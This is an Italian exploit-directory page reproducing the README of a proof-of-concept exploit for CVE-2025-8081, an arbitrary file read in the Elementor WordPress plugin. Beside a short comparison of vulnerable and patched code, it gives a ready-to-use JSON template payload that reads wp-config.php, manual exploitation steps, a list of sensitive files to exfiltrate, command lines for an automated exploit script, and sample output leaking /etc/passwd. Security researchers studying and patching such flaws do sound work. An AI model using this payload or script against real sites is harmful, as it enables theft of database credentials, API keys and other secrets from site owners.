Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-8081-Elementor — Proof-of-concept exploit per CVE-2025-8081, una lettura arbitraria di file nel plugin WordPress Elementor, che consente agli amministratori autenticati di leggere file sensibili come wp-config.php. | Kitploit
Strumenti/GitHubGitHub/lyesh4ck/cve-2025-8081-elementor
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHublyesh4ck/cve-2025-8081-elementor

CVE-2025-8081-Elementor

Proof-of-concept exploit per CVE-2025-8081, una lettura arbitraria di file nel plugin WordPress Elementor, che consente agli amministratori autenticati di leggere file sensibili come wp-config.php.

Vedi Repository
10 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-8081 - Vulnerabilità di Lettura Arbitraria di File in Elementor

Severity CVSS WordPress Elementor

Una vulnerabilità critica di lettura arbitraria di file nel plugin WordPress Elementor che consente ad amministratori autenticati di leggere qualsiasi file accessibile dal server web, inclusi file di configurazione sensibili contenenti le credenziali del database.


📋 Panoramica della Vulnerabilità

Informazioni CVE

ProprietàValore
ID CVECVE-2025-8081
TipoLettura Arbitraria di File (CWE-22: Path Traversal)
Punteggio CVSS4.9 (Medio) - Impatto Reale: CRITICO
Vettore CVSSAV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
Versioni InteressateElementor ≤ 3.30.2
Versione CorrettaElementor ≥ 3.30.3
Data di Rilascio22 luglio 2025
Data di Divulgazione15 ottobre 2025

Requisiti dell'Attacco

  • ✅ Account Amministratore WordPress
  • ✅ Plugin Elementor installato e attivato
  • ✅ Accesso alla funzionalità di importazione template
  • ✅ Widget Immagine di Elementor abilitato

Impatto

  • 🔴 Lettura Arbitraria di File: Legge qualsiasi file accessibile dall'utente del server web (www-data)
  • 🔴 Furto di Credenziali: L'accesso a wp-config.php rivela le credenziali del database e le chiavi di sicurezza
  • 🔴 Compromissione del Database: Accesso completo al database WordPress utilizzando le credenziali rubate

🎯 Dettagli della Vulnerabilità

Posizione

La vulnerabilità esiste in un singolo file a una singola riga:

root@kitploit:~
elementor/includes/template-library/classes/class-import-images.php
Riga 115 (v3.28.3)

Codice Vulnerabile (v3.28.3)

root@kitploit:~
if ( isset( $attachment['tmp_name'] ) ) {
    // Used when called to import a directly-uploaded file.
    $filename = $attachment['name'];
    $file_content = Utils::file_get_contents( $attachment['tmp_name'] );  // ❌ NO VALIDATION!
}

Problema: Il parametro tmp_name NON viene validato con is_uploaded_file(), consentendo a un attaccante di specificare percorsi di file arbitrari.

Codice Corretto (v3.30.3)

root@kitploit:~
if ( isset( $attachment['tmp_name'] ) ) {
    // Used when called to import a directly-uploaded file.
    $filename = $attachment['name'];
    $file_content = false;
    // security validation in case the tmp_name has been tampered with
    if ( is_uploaded_file( $attachment['tmp_name'] ) ) {  // ✅ VALIDATION ADDED!
        $file_content = Utils::file_get_contents( $attachment['tmp_name'] );
    }
}

Correzione: La patch aggiunge la validazione is_uploaded_file() per garantire che tmp_name si riferisca a un file caricato legittimamente tramite POST HTTP.


💣 Proof of Concept

Payload JSON

root@kitploit:~
{
  "content": [{
    "id": "s1",
    "elType": "section",
    "settings": [],
    "elements": [{
      "id": "c1",
      "elType": "column",
      "settings": {"_column_size": 100},
      "elements": [{
        "id": "w1",
        "elType": "widget",
        "widgetType": "image",
        "settings": {
          "image": {
            "url": "http://x.com/x.jpg",
            "id": 1,
            "tmp_name": "/var/www/html/wp-config.php",
            "name": "leaked_config.txt"
          }
        },
        "elements": []
      }]
    }]
  }],
  "version": "0.4",
  "type": "page"
}

Passaggi di Sfruttamento Manuale

  1. Accedi a WordPress come Amministratore
  2. Vai su Elementor → I Miei Template → Importa Template
  3. Carica il payload JSON sopra (salvalo come payload.json)
  4. Clicca su Importa Ora
  5. Vai su Media → Libreria
  6. Trova e scarica leaked_config.txt

Risultato: Contenuto di wp-config.php con le credenziali del database esposte!


📊 File Interessanti da Esfiltrare

File Critici

FileDescrizioneImpatto
/var/www/html/wp-config.phpConfigurazione WordPress🔴 CRITICO - Credenziali DB
/proc/self/environVariabili d'ambiente🔴 CRITICO - Chiavi API, segreti

File ad Alto Valore

FileDescrizioneImpatto
/etc/passwdUtenti di sistema🟠 ALTO - Enumerazione utenti
/var/www/html/.htaccessConfigurazione server web🟠 ALTO - Divulgazione configurazione
/var/log/apache2/access.logLog Apache🟡 MEDIO - Divulgazione informazioni

🛠️ Sfruttamento Automatico

Avvio Rapido

root@kitploit:~
python3 exploit.py -t https://target.com -u admin -p password123

Opzioni della Riga di Comando

root@kitploit:~
Argomenti Richiesti:
  -t, --target URL        URL WordPress di destinazione (es., https://target.com)
  -u, --user USERNAME     Nome utente amministratore WordPress
  -p, --password PASS     Password amministratore WordPress

Argomenti Opzionali:
  -f, --file PATH         File da leggere (predefinito: /var/www/html/wp-config.php)
  -o, --output FILE       Nome del file di output (predefinito: generato automaticamente)
  --insecure, -k          Disabilita la verifica del certificato SSL
  -v, --verbose           Abilita output dettagliato per il debug
  -h, --help              Mostra il messaggio di aiuto

Esempi di Utilizzo

root@kitploit:~
# Sfruttamento di base (legge wp-config.php con payload predefinito)
python3 exploit.py -t http://target.com -u admin -p password123

# File di destinazione personalizzato
python3 exploit.py -t http://target.com -u admin -p password123 -f /etc/passwd

# Con HTTPS e certificato autofirmato
python3 exploit.py -t https://target.com -u admin -p password123 --insecure

# Modalità dettagliata con output personalizzato
python3 exploit.py -t http://target.com -u admin -p password123 \
  -f /etc/passwd -o users.txt -v

# Da OrbStack/Docker verso la macchina host
python3 exploit.py -t http://host.internal:8080 -u admin -p password123 -v

Output Atteso

root@kitploit:~
Kali:~$ python3 exploit.py  -t http://host.internal:8080 -u admin -p admin123 -f /etc/passwd

======================================================================
 CVE-2025-8081 - Elementor Arbitrary File Read
======================================================================
Target: http://host.internal:8080
File:   /etc/passwd
======================================================================

[INFO] Attempting WordPress authentication...
[SUCCESS] ✓ Authentication successful!
[INFO] Fetching AJAX nonce...
[INFO] Loading payload: payload.json
[INFO] Uploading malicious template...
[SUCCESS] ✓ Template uploaded successfully!
[INFO] Searching for leaked file: leaked_passwd.txt
[SUCCESS] ✓ Found file: http://host.internal:8080/wp-content/uploads/2025/10/leaked_passwd.txt
[INFO] Downloading file...
[SUCCESS] ✓ Downloaded 839 bytes

======================================================================
 EXPLOITATION SUCCESSFUL!
======================================================================
File URL:  http://host.internal:8080/wp-content/uploads/2025/10/leaked_passwd.txt
File size: 839 bytes
Saved to:  leaked_passwd.txt

--- FILE CONTENT (first 500 chars) ---
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin
--- END ---
======================================================================

⚖️ Disclaimer Legale

SOLO PER SCOPI EDUCATIVI E TEST AUTORIZZATI

Questo strumento è fornito esclusivamente per ricerca sulla sicurezza e test di penetrazione. L'utilizzo di questo strumento per attaccare obiettivi senza previo consenso reciproco è illegale.

È responsabilità dell'utente finale rispettare tutte le leggi locali, statali e federali applicabili.

  • ✅ Utilizzare solo su sistemi di tua proprietà o per cui hai esplicita autorizzazione scritta al test
  • ✅ Pratiche di divulgazione responsabile
  • ✅ Scopi educativi e di ricerca
  • ❌ L'accesso non autorizzato è illegale e punibile per legge
  • ❌ L'autore non si assume alcuna responsabilità per un uso improprio

Utilizzando questo strumento, accetti di usarlo in modo legale ed etico.


Ultimo Aggiornamento: 17 ottobre 2025

Scarica lo strumento